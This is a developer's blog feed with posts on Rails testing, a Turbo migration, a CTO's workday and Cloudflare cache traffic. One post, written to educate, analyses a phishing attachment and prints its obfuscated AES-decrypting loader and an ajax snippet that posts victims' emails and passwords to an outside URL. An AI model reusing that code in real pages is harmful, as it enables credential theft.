Recent Updates

  • kmitov 11:30 am on November 26, 2021 Permalink |
    Tags: apple, payment   

    Unsettled: The Future of Apple’s 30% Cut (by Fastspring) 

    I tried to give our team a quick summary of what is coming out of the Epic vs Apple case. After looking at a few different resources, I think the following webinar gives a good understanding of what is happening.

    (source https://fastspring.wistia.com/medias/tutvwsihof)

    Current status summary

    1. There is a new possible “Web flow” that opens a lot of possibilities that were previously not available.
    2. You have more flexibility to target users in specific ways.
    3. It unlocks optimization for customer lifetime value – retention, cross-sell.
    4. The future might be: enter the app ecosystem and then use a web flow outside of Apple for selling, cross-selling and communication.
    5. There might be fewer “Paid” apps going forward. There will be a move to “Subscriptions”.
    6. It is more likely for change to come from regulatory and government efforts than from court rulings.
     
  • kmitov 7:16 am on November 16, 2021 Permalink |
    Tags:   

    How they tried to compromise our CEO and what a phishing email contains 

    Are you curious about what is inside those phishing emails and how they try to steal your password?

    This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

    A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

    Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

    Content of phishing email

    This is the email. It has an attachment. Looks kind of real.

    This is what the attachment looks like:

    What could you do:

    1. Check the sender
    2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is legit.
    3. Don’t click on attachments

    The attachment is an HTM file

    This file opens in the web browser on Microsoft Windows machines. Let’s see the content of this file if you open it with a text editor:

    A sample of it is:

    <script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

    This file contains an HTML document. HTML is the format of web pages, and once you click on this file, it will open in your web browser and the browser will execute it.

    Note: Don’t click on such attachments.

    What is unescape?

    This unescape here means that the string

    “‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.

    ‘unescape’ is a function that decodes this encoding. It is technical, but in the end the goal is to make sure this file could be read by all browsers.
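
    Just to illustrate the decoding, here is the same kind of percent-decoding done in Ruby. This is not part of the phishing code, only an equivalent of what the browser’s unescape does:

    require "cgi"

    encoded = "%3C%73%63%72%69%70%74%3E"
    puts CGI.unescape(encoded) # => "<script>"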

    The result of unescaping the content looks like:

    <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
      <script>
      function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
          var obj_json = JSON.parse(encrypted_json_string);
          var encrypted = obj_json.ciphertext;
          var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
          var iv = CryptoJS.enc.Hex.parse(obj_json.iv);   
          var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
          var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
          return decrypted.toString(CryptoJS.enc.Utf8);
      }
      document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

    Here is what happens in the code in simple terms:

    There is an encrypted text called “ciphertext” and this cipher text is decrypted and executed. This happens on the last line of the fragment above.

    So the phishing mail contains an attachment, this attachment is ‘escaped’, and the ‘escaped’ content is encrypted.

    What’s the content of the ciphertext?

    The cipher text contains a web page that your browser will render. It looks like a real web page – a real Microsoft 365 page.

    Here is a screenshot:

    Where you see “pesho@gmail.com” in the screenshot, you would see your own email.
    This makes the page look more real to you.

    The summary so far – the phishing email contains an attachment with executable HTML code that is escaped; the escaped content is encrypted; and the encrypted content contains an HTML page that looks like the Microsoft login page.

    What happens when you fill in your email and password?

    There is a fragment of the code of the page that looks like this:

    count=count+1
      $.ajax({
        dataType: 'JSON',
        url: 'https://sintracoopmn.com.br/process.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
          detail:detail,
    
        },

    This code will send your email and password to the following web address: https://sintracoopmn.com.br/process.php

    Let’s try it.

    I add the username pesho@gmail.com with password ‘abcd1234’

    Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but it will also log me in to my Office 365 account.

    So I will not even realize that I was compromised.

    What can you do?

    Add two-factor authentication.

    That’s the easiest, most secure solution. Add two-factor authentication that will send you an SMS every time you log in or will require you to use an authenticator app.

    If you haven’t done it already, I would advise you to do it now.

     
  • kmitov 7:13 am on November 10, 2021 Permalink |
    Tags:

    Migrating to jasmine 2.9.1 from 2.3.4 for teaspoon 

    We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4

    There is an error that started occurring randomly. Before digging down, investigating it and in the end finding out that it is probably a result of a wrong version, we decided to try to get up to date with jasmine.

    The latest jasmine version is 3.x, but 2.9.1 is already a huge step from 2.3.4.

    We will try to migrate to 2.9.1 first. The issue is that the moment we migrated, this error appeared:

    'beforeEach' should only be used in 'describe' function

    It took a couple of minutes, but what we found out is that fixtures are used in a different way in each version.

    Here is the difference and what should be done.

    jasmine 2.3.4

    fixture.set can be called both in the beforeEach and in the describe

    // This works
    // fixture.set is in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);
      beforeEach(function() {
      })
    })
    // This works
    // fixture.set is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })

    jasmine 2.9.1

    fixture.set can only be called in the describe and not in the beforeEach

    // This does not work as the fixture is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })
    // This does work
    // fixture.set could be only in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);  
      beforeEach(function() {
        
      })
    })
     
  • kmitov 8:57 am on October 8, 2021 Permalink |
    Tags: amazon-s3

    Sometimes you need automated test on production 

    In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.

    The case

    We have a feature on one of our platforms:

    1. User clicks on “Export” for a “record”
    2. A job is scheduled. It generates a CSV file with information about the record and uploads it to S3. Then a presigned_url valid for 72 hours is generated and an email with a link to download the file is sent to the user (a sketch of such a job is shown below).
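
    To make the flow concrete, here is a minimal sketch of what such a job could look like. The class, key and mailer names are made up for illustration and are not the actual implementation; generate_csv is assumed to return a local file path.

    class ExportRecordJob < ApplicationJob
      queue_as :default

      def perform(record, user)
        csv_path = generate_csv(record) # build the CSV file for the record

        # Upload the CSV to S3
        object = Aws::S3::Resource.new
                                  .bucket(Rails.configuration.aws_bucket)
                                  .object("exports/#{record.id}.csv")
        object.upload_file(csv_path)

        # Generate a link that is valid for 72 hours
        url = object.presigned_url(:get, expires_in: 72 * 3600)

        # Email the link to the user
        ExportMailer.with(user: user, link: url).successful_export.deliver_later
      end
    end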

    The question is how do you test this?

    Confidence

    When it comes to specs I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious about what kind of spec it is, as long as it gives me confidence and it is not standing in my way by being too fragile.

    Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.

    Going with a System/Integration spec

    A spec that would give me confidence here is one that simulates the user behavior with Rails system specs.
    The user clicks on Export and I check that we’ve received an email and that this email contains a link:

      scenario "create an export, uploads it on s3 and send an email" do
        # Set up the record
        user = FactoryBot.create(:user)
        record = FactoryBot.create(:record)
        ... 
    
        # Start the spec
        login_as user
        visit "/records"
        click_on "Export"
        expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
    
        mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
        expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
        link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
    
        csv_content = read_csv_in_zip_given_my_link link_to_exported_zip 
        expect(csv_content).not_to be_nil
        expect(csv_content).to include user.username
      end

    This spec does not work!

    First problem – AWS was stubbed

    We have a lot of other specs that are using the S3 API. It is a good practice, as you don’t want all your specs to touch S3 for real. It is slow and it is too coupled. But for this spec there was a problem. There was a file uploaded to S3, but the file was empty. The reason was that on one of the machines that was running the specs there was no ‘zip’ command. It was not installed, and we are using ‘zip’ to create a zip of the csv files.

    Because of this I wanted to upload an actual file somehow and actually check what is in the file.

    I created a spec filter that would start a specific spec with real S3.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      config.before(:each) do
        # Stub S3 for all specs
        Aws.config[:s3] = {
          stub_responses: true
        }
      end
    
      config.before(:each, s3_stub_responses: false) do
        # but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
        Aws.config[:s3] = {
          stub_responses: false
        }
      end
    end

    This allows us to start the spec:

      scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
        # Now in this spec S3 is not stubbed and we upload the file
      end

    Yes, we could run a local S3 server, but then comes the second problem.

    Mailer was adding invalid params

    In the email we are sending a presigned_url to the S3 file as the file is not public.
    But the mailer that we were using was adding “utm_campaign=…” to the url params.
    This means that the S3 presigned url was not valid. Checking whether there is a url in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.
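
    For reference, a possible implementation of the read_csv_in_zip_given_my_link helper used in the spec above could look like the sketch below. The helper name comes from the spec; the body here is an assumption that uses the rubyzip gem.

    require "open-uri"
    require "zip" # rubyzip
    require "tempfile"

    def read_csv_in_zip_given_my_link(link)
      Tempfile.create(["export", ".zip"]) do |file|
        # Download the zip from the presigned S3 url
        file.binmode
        file.write URI.open(link).read
        file.flush

        # Read the first CSV entry from the archive
        Zip::File.open(file.path) do |zip|
          entry = zip.glob("*.csv").first
          return entry && entry.get_input_stream.read
        end
      end
    end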

    This was still not enough.

    It is still not working on production

    All the tests were passing with a real S3 and a real mailer in the test and development env, but when I went to production the feature was not working.

    The problem was with the configuration. In order to upload to S3 we need to know the bucket. The bucket was configured for test and development but was missing for production:

    config/environments/development.rb:  config.aws_bucket = 'the-bucket'
    config/environments/test.rb:  config.aws_bucket = 'the-bucket'
    config/environments/production.rb: # there was no config.aws_bucket

    The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly is to run the spec on a real production.

    Should we run all specs on a real production?

    Of course not. But there should be a few specs for a few features that test that the buckets have the right permissions, that they are accessible, and that the configuration in production is right. This is what I’ve added. Once a day a spec runs on production and tests that everything works with the real S3, real db, real env and configuration, the same way that users will use the feature.
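
    The scheduling itself could be as simple as a small rake task invoked by cron once a day. This is only a sketch under a few assumptions – the spec file name is invented and the tag is the one from the examples above:

    # lib/tasks/production_check.rake (hypothetical)
    namespace :production do
      desc "Run the export smoke spec against the real production configuration"
      task :smoke_spec do
        # Runs only the spec that talks to the real S3; cron invokes this once a day.
        sh "bundle exec rspec spec/system/export_spec.rb --tag s3_stub_responses:false"
      end
    end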

    How is this part of the CI/CD?

    It is not. We do not run this spec before deploy. We run all the other specs before deploy, which gives us 99% confidence that everything works. But for the last one percent we run a spec once every day (or after deploy) just to check a real, complex scenario involving the communication between different systems.

    It pays off.

     
  • kmitov 7:33 am on October 8, 2021 Permalink |
    Tags: hotwire, turbo

    [Rails, Hotwire] Migrate to Turbo from rails-ujs and turbolinks – how it went for us. 

    We recently decided to migrate one of our newest platforms to Turbo. The goal of this article is to help anyone who plans to do the same migration. I hope it gives you a perspective on the amount of work required. Generally it was easy and straightforward, but a few specs had to be changed because of urls and controller results.

    Gemfile

    Remove turbolinks and add turbo-rails. The change was

    --- a/Gemfile.lock
    +++ b/Gemfile.lock
    @@ -227,9 +227,8 @@ GEM
         switch_user (1.5.4)
         thor (1.1.0)
         tilt (2.0.10)
    -    turbolinks (5.2.1)
    -      turbolinks-source (~> 5.2)
    -    turbolinks-source (5.2.0)
    +    turbo-rails (0.7.8)
    +      rails (>= 6.0.0)

    application.js and no more rails-ujs and Turbolinks

    Added “@hotwired/turbo-rails” and removed Rails.start() and Turbolinks.start()

    --- a/app/javascript/packs/application.js
    +++ b/app/javascript/packs/application.js
    @@ -3,8 +3,7 @@
     // a relevant structure within app/javascript and only use these pack files to reference
     // that code so it'll be compiled.
    
    -import Rails from "@rails/ujs"
    -import Turbolinks from "turbolinks"
    +import "@hotwired/turbo-rails"
     import * as ActiveStorage from "@rails/activestorage"
     import "channels"
    
    @@ -14,8 +13,6 @@ import "channels"
     // Collapse - needed for navbar
     import { Collapse } from 'bootstrap';
    
    -Rails.start()
    -Turbolinks.start()
     ActiveStorage.start()

    package.json

    The change was small

    --- a/package.json
    +++ b/package.json
    @@ -2,10 +2,10 @@
       "name": "platform",
       "private": true,
       "dependencies": {
    +    "@hotwired/turbo-rails": "^7.0.0-rc.3",
         "@popperjs/core": "^2.9.2",
         "@rails/actioncable": "^6.0.0",
         "@rails/activestorage": "^6.0.0",
    -    "@rails/ujs": "^6.0.0",
         "@rails/webpacker": "5.4.0",
         "bootstrap": "^5.0.2",
         "stimulus": "^2.0.0",

    Devise still does not work

    For the Devise forms you have to add “data: {turbo: ‘false’}” to disable turbo for them

    +<%= form_for(resource, as: resource_name, url: password_path(resource_name), html: { method: :post }, data: {turbo: "false"}) do |f| %>

    We are waiting for resolutions on https://github.com/heartcombo/devise/pull/5340

    Controllers have to return an unprocessable_entity on form errors

    If there are active_record.errors in the controller we must now return status: :unprocessable_entity

    +++ b/app/controllers/records_controller.rb
    @@ -14,7 +14,7 @@ class RecordsController < ApplicationController
         if @record.save
           redirect_to edit_record_path(@record)
         else
    -      render :new
    +      render :new, status: :unprocessable_entity
         end
       end

    application.js was reduced significantly

    The old application.js – 932 KiB

      application (932 KiB)
          js/application-dce2ae8c3797246e3c4b.js

    The new application.js – 248 KiB

    remote:        Assets: 
    remote:          js/application-b52f4ecd1b3d48f2f393.js (248 KiB)

    Conclusion

    Overall a good experience. We are still facing some minor issues with third party chat widgets like tawk.to that do not work well with turbo, as they are sending 1 more request, refreshing the page and adding the widget to an iframe that is lost with turbo navigation. But we would probably move away from tawk.to.

     
  • kmitov 6:29 am on October 8, 2021 Permalink |
    Tags: , , ,   

    [Rails] Warden.test_reset! does not always reset and the user is still logged in 

    We had this strange case of a spec that was randomly failing

      scenario "generate a subscribe link for not logged in users" js: true do 
        visit "/page_url"
    
        expect(page).to have_xpath "//a[text()='Subscribe']"
        click_link "Subscribe"
        ...
      end 

    When a user is logged in we generate a button that subscribes them immediately. But when a user is not logged in we generate a link that will direct the users to the subscription page for them to learn more about the subscription.

    This works well, but the spec is randomly failing sometimes.

    We expect there to be a link, e.g. “//a”, but on the page there is actually a button, e.g. “//button”.

    What this means is that when the spec started there was a logged in user. The user was still not logged out from the previous spec.
    This explains why the spec sometimes fails and sometimes passes – because we are running all the specs in a random order:

    $ RAILS_ENV=test rake spec SPEC='...' SPEC_OPTS='--order random'

    Warden.test_reset! is not always working

    There is a Warden.test_reset! that is supposed to reset the session, but it seems for js: true cases where we have a Selenium driver the user is not always reset before the next test starts.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      ...
      config.after(:each, type: :system) do
        Warden.test_reset!
      end
    end

    Logout before each system spec that is js: true

    I decided to try to explicitly log out before each js: true spec that is ‘system’, so I improved the RSpec configuration:

    RSpec.configure do |config|
      config.before(:each, type: :system, js: true) do
        logout # NOTE Sometimes when we have a js spec the user is still logged in from the previous one
        # Here I am logging it out explicitly. For js it seems Warden.test_reset! is not enough
        #
        # When I run the specs without this logout, the results are
        # Finished in 3 minutes 53.7 seconds (files took 28.79 seconds to load)
        #   383 examples, 0 failures, 2 pending
        #
        # With the logout they are
        #
        # Finished in 3 minutes 34.2 seconds (files took 21.15 seconds to load)
        #   383 examples, 0 failures, 2 pending
        #
        # Randomized with seed 26106
        # 
        # So we should not be losing on performance
      end
    end

    Conclusion

    Warden.test_reset! does not always log out the user successfully before the next spec when the specs use the Selenium driver – e.g. “js: true”. I don’t know why, but that is the observed behavior.
    I’ve added a call to “logout” before each system spec that is js: true to make sure the user is logged out.

     
  • kmitov 9:00 am on October 5, 2021 Permalink |
    Tags:   

    A day in the life of a CTO – “what do you do, day to day?”

    My brother asked me the other day:

    He: – So what do you do, day to day?

    Me: – I work in engineering (software, data and AI).

    It’s a little bit more than that. Not all the days are the same. There are a lot of decisions to be made, and generally with a little luck those decisions will keep the ship at least in the right direction.

    I decided to look deeper and keep a record. There is a difference between what we think we are doing and what we are actually doing. I tried to summarize just one of my recent days spent in engineering. This was a day without any software development for me.

    My hope with this article is to be able to answer my brother – “What do you do, day to day?” and I hope this answer and examples could be interesting to people entering the world of Software engineering and to business and product people trying to learn more about how their engineers spend their day.

    Adding a JSONB column to a schema

    A colleague was facing the issue of storing an array of values in a DB. The values were the result of calling the API of an external service for our business.

    How do you store these values? There are many different ways. I supported his recommendation to store the data in JSON format. I only suggested changing the type of the column to JSONB, as this will later allow us to query the table in an easier way. At the same time I had to re-think part of the stack to see if there would be any implications on the whole platform when this new JSONB column is introduced. Luckily there were no implications.
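
    As an illustration, such a change is a one-line migration. The table and column names below are invented, not the real ones:

    class AddApiResultsToRecords < ActiveRecord::Migration[6.1]
      def change
        # jsonb instead of json, so that Postgres can index and query the values later,
        # e.g. Record.where("api_results @> ?", [{ "status" => "ok" }].to_json)
        add_column :records, :api_results, :jsonb, null: false, default: []
      end
    end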

    Automated test that we create a table

    A colleague was working on a pipeline and the specs for this pipeline. The question was how we build a spec for part of the logic. The logic creates a new table. How do we test this in an automated way? How do we test that this logic creates the table? We considered two different approaches and together we looked for a good API call to test this.

    We decided on how to spec this behavior.
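
    One way to spec it, sketched below with invented names, is to run the logic and ask the connection whether the table is there:

    # A sketch with hypothetical names; the real pipeline and table are different.
    RSpec.describe CreateEventsTable do
      it "creates the events table" do
        expect(ActiveRecord::Base.connection.table_exists?("events")).to be false

        described_class.new.call

        expect(ActiveRecord::Base.connection.table_exists?("events")).to be true
      end
    end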

    DateTime field

    A colleague was facing an issue with a date field in the data platform that had invalid values. The issue was that we were storing both the date and the time for an event where we should have been storing only the time. The implications were huge. We now had to migrate all the values in all the records.

    In this case we looked at the product requirements on what should be included in the data platform in the near future. Turns out that there is a requirement for engineering to store not only the time, but also the date of the event. This means there was nothing to fix as we were ahead of time in engineering. We only have to migrate a couple of records.

    The decision here was whether we should spend a day migrating this data and what would be the issue if the data was not migrated.

    Choose a service $50/80GB

    A colleague had the task to look at different services that we could use. We had to decide whether to use this $50 service or that $50 service. The decision is important because once you decide on a service to add to your stack it is difficult to move out of this service. You kind of stay with them at least for the near future.

    Sometimes when you look at two services on your own you can overlook a few of the aspects, so it is a good practice to have a second look from someone else. Also, in the end it is a team decision what to include in the stack.

    Integration with an external API

    A colleague was working on integrating with an external API. The issue was that this API returns different formats for different calls. The question was how we handle this. Should we hard code the schema for this API, should we infer it, should we do something smarter? How does this impact the abstraction for the other data sources? We had to get on a call with the external API representatives to discuss if they could help us.

    Creating new repos

    A colleague was working on new features in the platform. These new features should be extracted into new repositories. We had to decide on the names of the repositories. In the world of software development there are two hard things – cache invalidation and naming. Naming is important because it gives you power over things. Once you name them you have power over them. If you name them badly, then they have power over you. Nevertheless, we had to make a decision on how we name two new code repositories.

    Abilities

    A colleague was working on the authorization part of the platform. We are adding new authorizations based on roles. He developed the code and was ready for a code review. I was there and decided to jump on the code review. The issue with the implementation was that it was coupling the authorization with all the modules in a single class. Coupling is bad in the long run as it is not very agile and is difficult to maintain. We spent time decoupling the implementation.

    System vs model specs

    A colleague was in the middle of developing an automated spec. There are generally two types of specs – integration and unit. In our case we use “system” and “model” specs. System specs test the behavior of the whole feature. Unit specs test the behavior of a specific unit (class, function). My general rule of thumb is – 10% system specs, 90% model specs, but start with the system spec. I’ve been in situations with too many system specs which make the system unmaintainable and require us to invest a lot of time in refactoring. Since then I am cautious about what kind of specs are developed, when and why. We revised current assumptions and decided whether the current specs should be developed as system or unit specs.

    Flash messages

    A colleague was working on some flash messages on the platform that are appearing at a specific moment. I took a look and confirmed the implementation and the behavior.

    Constructing new objects

    A colleague was working on refactoring part of the code. A general rule of thumb I try to follow is to “always construct instances of a given type” at only one specific place in the code. We revised the implementation and saw that there are a few places where instances of a given type were constructed. There is an easy solution for this. We scheduled it for the following week to be implemented.
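
    A tiny sketch of that rule with hypothetical names – all Report instances are built in one place, so a change to the constructor touches a single method:

    # Hypothetical example of constructing instances of a type in only one place.
    class ReportFactory
      def self.build(record)
        # The only place in the code base that calls Report.new
        Report.new(id: record.id, title: record.title)
      end
    end

    # Everywhere else:
    report = ReportFactory.build(record)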

    Submit button change type to input

    A colleague was working on a feature on the web platform and noticed that a few of the forms had the wrong type of button. I was around and I was the one who had previously committed this form, so he notified me about the change and we discussed the implications.

    Structure of blob storage

    A colleague was working on an integration with an API that will store information in our BigData Lake. We had to sync on the structure of the lake and how it will accommodate the new API.

    Infrastructure from code

    A colleague was working on deploying on a cloud provider. We try to create our infrastructure from code. It is way too easy to set up an infrastructure, spend a week deploying it, and then be unable to reproduce it later on because of the gazillion different options and little configurations you have to do on the cloud providers. Just ask anyone who has configured AWS IAM permissions and resources.

    It is important to have a script that would create your infrastructure from code. We had to revise, review and think about the implications of the resources that the code creates.

    Conclusion

    No actual conclusion. This is just a diary of the day. I hope that my brother along with many others now understand more about our work.

     
  • kmitov 4:30 am on September 8, 2021 Permalink |
    Tags: airflow, apache, bigdata   

    Orchestration of BigData with Apache Airflow 

    It was a pleasure for me to do this presentation and discuss how we can orchestrate BigData with Apache Airflow at the 2021 OpenFest event.

    Video is in Bulgarian

     
  • kmitov 5:48 am on September 6, 2021 Permalink |
    Tags:

    Refresh while waiting with RSpec+Capybara in a Rails project 

    This is some serious advanced stuff here. You should share it.

    A colleague, looking at the git logs

    I recently had to create a spec with Capybara+RSpec where I refresh the page and wait for a value to appear on this page. In this particular scenario there is no need for WebSockets or any JS. We just need to refresh the page.

    But how do we test it?

    # Expect that the new records page will show the correct value of the record
    # We must do this in a loop as we are constantly refreshing the page.
    # We need to stay here and refresh the page
    # 
    # Use Timeout.timeout to stop the execution after the default Capybara.default_max_wait_time
    Timeout.timeout(Capybara.default_max_wait_time) do
      loop do
        # Visit the page. If you visit the same page a second time
        # it will refresh the page.
        visit "/records"
        # The smart thing here is the wait: 0 param
        # By default find_all will wait for Capybara.default_max_wait_time as it is waiting for all JS methods 
        # to complete. But there is no JS to complete and we want to check the page as is, without waiting 
        # for any JS, because there is no JS. 
        # 
      # We pass a "wait: 0" which will check and return immediately
        break if find_all(:xpath, "//a[@href='/records/#{record.to_param}' and text()='Continue']", wait: 0).any?
    
        # If we could not find our record we sleep for 0.25 seconds and try again.
        sleep 0.25
      end
    end

    I hope it is helpful.

    Want to keep in touch – find me on LinkedIn or Twitter.

     
  • kmitov 10:49 am on September 3, 2021 Permalink |
    Tags: aws, cloudflare, nginx

    When the policeman becomes the criminal – how Cloudflare attacks my machines. 

    On the Internet you are nobody until someone attacks you.

    It gets even more interesting when the attack comes from someone with practically unlimited resources and when these are the same people that are supposed to protect you.

    This article is the story of how Cloudflare started an “attack” on a machine at the FLLCasts platform. This increased the traffic of the machine about 10x and AWS started charging the account 10x more. I managed to stop them and I hope my experience is useful for all CTOs, sysadmins, devops and others that would like to understand more and look out for such cases.

    TL; DR;

    The current up to date status is – after all the investigation it turns out that when a client makes a HEAD request for a file, this will hit the Cloudflare infrastructure. Cloudflare will then send a GET request to the account machine and will cache the file. This changed on 28 August. Before 28 August, when clients were sending HEAD requests, Cloudflare was sending HEAD requests (which don’t generate traffic). After 28 August clients are still sending HEAD requests, but now Cloudflare is sending GET requests, generating terabytes of additional traffic that is not needed.

    Increase of the Bill

    On 28 August 2021 I got a notification from AWS that the account is close to surpassing its budget for the month. This is not surprising as it was the end of the month, but nevertheless I decided to check. It turned out that the traffic to one of the machines had increased 10x in a day. Nothing else had increased. No visits, no other resources, just the traffic to this one particular machine.
    That was strange. This has been going on for 7 days now and this is the increase of the traffic:

    AWS increase of the bill

    Limit billing on AWS

    My first thought was “How can I set a global limit on AWS spending for this account? I don’t want to wake up with $50K in traffic charges the next day.”

    The answer is “You can’t”. There is no way to set a global spending limit for an AWS account. This was something I already knew, but I decided to check again with support and yes, you can’t set such a limit. This means that AWS is providing all the tools for you to be bankrupted by a third party and they are not willing to limit it.

    Limit billing on Digital Ocean

    I have some machines on Digital Ocean and I checked there. “Can I set a global spending limit for my account where I will no longer be charged and all my services will stop if my spending is above X amount of dollars?”
    The answer was again – “No. Digital Ocean does not provide it”.

    Should there be a global limit on spending on cloud providers?

    My understanding is – yes. There is a break-even point where users are coming to your service and generating revenue while you are delivering the service and this is costing you money. Once it costs you more to deliver the service than the revenue that the service is generating, I would personally prefer to stop the service. There is no need for it to be running. Otherwise you could wake up with a $50K bill.

    AWS monitoring

    I had the bill from AWS so I tried looking at the monitoring.
    There is a spike every day between 03:00 AM UTC and 05:00 AM UTC. This spike is increasing the traffic by hundreds of gigabytes. It could easily be terabytes next time.
    The conclusion is that the machine is heavily loaded during this time.

    AWS monitoring

    Nginx access.log

    Looking at the access log I see that there are a lot of requests by machines that are using a user agent called ‘curl’. ‘curl’ is a popular tool for accessing files over HTTP and is heavily used by different bots. But bots tend to identify themselves.

    This is what the access.log looks like:

    172.68.65.227 - - [30/Aug/2021:03:26:02 +0000] "GET /f9a13214d1d16a7fb2ebc0dce9ee496e/file1.webm HTTP/1.1" 200 27755976 "-" "curl/7.58.0"

    Parsing the log file

    I have my years of bash experience, and a couple of commands later I had a list of all the IPs and how many requests we’ve received from each of them.

    grep curl access.log | cut -d ' ' -f 1 | sort | uniq -c | sort -n

    The result is 547 machines. The full log file is available at – Full list of Cloudflare IPs attacking my machine. The top 20 are below (there are some IPs that are not from Cloudflare). The first column is the number of requests, the second is the IP of the machine.

    NumberOfRequest IP
        113 172.69.63.18
        117 172.68.65.107
        150 172.70.42.135
        158 172.70.42.161
        164 172.69.63.82
        167 172.70.42.129
        169 172.69.63.116
        170 172.68.65.231
        173 172.68.65.101
        178 172.69.63.16
        178 172.70.42.143
        188 173.245.54.236
        264 172.70.134.69
        268 172.70.134.117
        269 172.70.134.45
        287 172.70.134.153
        844 172.70.34.131
        866 172.70.34.19
        904 172.70.34.61
        912 172.70.34.69

    These are Cloudflare machines!

    Looking at the machines that are making the requests, these are 547 different machines, most of which are Cloudflare machines. These are servers that Cloudflare seems to be running.

    How does Cloudflare work?

    For this particular FLLCasts account with this particular machine, I set up Cloudflare years ago to sit in front of the machine and help protect the account from internet attacks.

    The way Cloudflare works is that only Cloudflare knows the IP address of our machine. This is the promise that Cloudflare is making. Because only they know the IP address of the machine, only they know what the IP address for a given domain is. In this way, when a user points their browser at “http://domainname”, the internet will direct this request to Cloudflare, then Cloudflare will check if this request is ok, and then and only then forward this request to our machine. But in the meantime Cloudflare is trying to help businesses like the platform by caching the content. This means that when Cloudflare receives a request for a file, they will check in their Cloudflare infrastructure if this file was cached and send a request to the account machine only if there is no cache.

    In a nutshell Cloudflare maintains a cache for the content the platform is delivering.

    Image is from Cloudflare support at https://support.cloudflare.com/hc/en-us/articles/205177068-How-does-Cloudflare-work-

    What is broken?

    Cloudflare maintains a cache of the platform resources. Every night between 03:00 AM UTC and 05:00 AM UTC some 547 Cloudflare machines decide to update their cache and they start sending requests to our server. These are 10x more requests than the machine generally receives from all users. The content on the server does not change. It’s been the same content for years. But for the last 7 days Cloudflare has been caching the same content every night on 547 machines.

    And AWS bills us for this.

    Can Cloudflare help?

    I created a ticket. The response was along the lines of “You are not subscribed for our support, you can get only community support”. Fine.
    I called them on the phone early in the morning.
    I called enterprise sales and I asked them.

    Me - "Hi, I am under attack. Can you help?"
    They - "Yes, we can help. Who is attacking you?"
    Me - "Well, you are. Is there an enterprise package I could buy so that you can protect me against your attack?"

    Luckily the guy on the phone caught my sense of humor and urgency and quickly organized a meeting with a product representative. Regrettably there were no solution engineers on this call.

    Both guys were very knowledgeable, but I had difficulties explaining that it was actually Cloudflare causing the traffic increase. I had all the data from AWS, from the access.log files, but the support agents still had some difficulty accepting it.

    To be clear – I don’t think that Cloudflare is maliciously causing this. There is no point. What I think has happened is some misconfiguration on their side that caused this for the last 7 days.

    What I think has happened?

    I tried to explain to the support agents that there are a few scenarios, most of which Cloudflare is responsible for.

    1. Option 1 – “someone that has 547 machines is trying to attack the FLLCasts account and Cloudflare is failing to stop it”. First this is very unlikely. Nobody will invest in starting 547 machines just to make the platform pay a few dollars more this month. And even if this is the case, this is what Cloudflare should actually prevent, right? Option 1: “Cloudflare is failing in preventing attacks” (unlikely)


    2. Option 2 – “only Cloudflare knows the IP of this domain name and they have been compromised.” The connection between domain name and IP address is something that only Cloudflare knows about. If a third party knows the domain name and they are able to find the IP address, this means that they have compromised Cloudflare. Option 2: “Cloudflare is compromised” (possible, but again, unlikely)

    3. Option 3 – “there is a misconfiguration in some of the Cloudflare servers”. I don’t like looking for malicious activity where everything could be explained with simple ignorance or a mistake. Most likely there is a misconfiguration in the Cloudflare infrastructure that is causing these servers to behave in this way. Option 3: “There is a misconfiguration in Cloudflare infrastructure”

